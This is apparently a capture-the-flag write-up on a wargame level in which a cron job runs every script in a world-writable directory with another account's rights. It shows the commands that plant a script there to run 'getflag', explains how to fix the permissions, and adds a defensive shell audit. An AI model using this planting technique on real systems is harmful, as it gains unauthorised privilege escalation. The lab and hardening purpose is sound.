- Usage of lazy permissions!
This level uses a workflow to do some work. Within this workflow a cron job runs every couple of minutes and executes every script inside a world-writable folder. Any script inside that folder, put there by any user, will eventually get executed using the rights of
There is a file called writable.sh and a directory called writable.d inside the directory
As one can see, the script iterates over every file in the folder /home/flag03/writable.d and executes it.
ulimit -t 5 gives each executed script 5 seconds of CPU time to do whatever it is doing.
Create a file foo inside that directory:
echo 'getflag >/tmp/flag03' > /home/flag03/writable.d/foo
Wait until the file has been executed and look for the flag:
while [[ ! -f /tmp/flag03 ]] ; do echo -n . ; sleep 1 ; done ; echo 'win!!!' ; cat /tmp/flag03
Lesson / How to fix
- Use restrictive permissions!
In this workflow any user may supply a script that is eventually executed in the name of flag03. One should always know who is involved in a workflow and what these persons/entities can do.
In order to secure this level, use restrictive permissions! I repeat, as this is really important! Do not use default permit, i.e. letting everybody do anything in the name of flag03 (in this case)!
chmod 0750 /home/flag03/writable.d
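The permission fix above can be checked mechanically. The following is an added example, not part of the original write-up: a small audit for a cron drop-in directory like the one in this level. The function names are hypothetical, and it assumes a POSIX shell with find, ls and awk.

```shell
#!/bin/sh
# Added example: audit a directory whose contents are executed by a cron job.
# Function names are hypothetical; the directory is supplied by the caller.

# Succeeds when directory $1 is writable by "other" users.
dir_is_world_writable() {
    [ -n "$(find "$1" -prune -type d -perm -0002 2>/dev/null)" ]
}

# Prints the numeric UID that owns $1.
dir_owner_uid() {
    ls -ldn "$1" | awk '{print $3}'
}

# Succeeds when $1 is a regular file (not a symlink), owned by UID $2,
# and not writable by group or other.
script_is_trusted() {
    [ -n "$(find "$1" -prune -type f -user "$2" ! -perm -0020 ! -perm -0002 2>/dev/null)" ]
}

# Prints the entries of directory $1 that a runner could safely execute.
# Dotfiles are skipped, as they are not matched by the glob.
list_trusted_scripts() {
    owner=$(dir_owner_uid "$1")
    for f in "$1"/*; do
        if script_is_trusted "$f" "$owner"; then printf '%s\n' "$f"; fi
    done
}

# Reports every problem found in $1; returns non-zero if there is any.
audit_dropin_dir() {
    rc=0
    owner=$(dir_owner_uid "$1")
    if dir_is_world_writable "$1"; then
        echo "FAIL: $1 is world-writable"
        rc=1
    fi
    for f in "$1"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # empty directory: glob stays literal
        script_is_trusted "$f" "$owner" || { echo "FAIL: untrusted entry $f"; rc=1; }
    done
    return "$rc"
}

# Stand-alone use: sh audit.sh /path/to/dropin.d
if [ "$#" -gt 0 ]; then audit_dropin_dir "$1"; fi
```

A runner that iterates over the output of list_trusted_scripts instead of a bare glob still refuses foreign files if the directory mode is loosened again later.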